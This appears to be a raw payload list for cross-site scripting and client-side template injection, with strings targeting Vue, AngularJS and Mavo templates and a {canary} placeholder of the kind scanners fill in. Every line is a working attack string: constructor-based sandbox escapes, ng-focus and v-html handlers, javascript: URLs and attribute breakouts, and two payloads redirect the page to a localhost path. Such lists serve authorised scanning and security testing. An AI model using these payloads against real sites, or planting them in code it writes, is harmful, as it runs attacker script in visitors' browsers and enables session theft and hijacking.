"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> {canary}</div>
<a data-mv-if='1 or self.alert(1)'>{canary}</a>
<a href=[javascript&':alert(1)']>{canary}</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('{canary}')lolx</div>
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' :d.location='//localhost/mH/'"></textarea></div>
<input ng-focus=$event.view.alert('{canary}')>
[''=''or self.alert(1)]
[(1,alert)(1)]
[7*7]
[Omglol mod 1 mod self.alert (1) andlol]
[self.alert(1)]
[self.alert(1)mod1]
javascript:alert(1)//../css-images
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{_openBlock.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
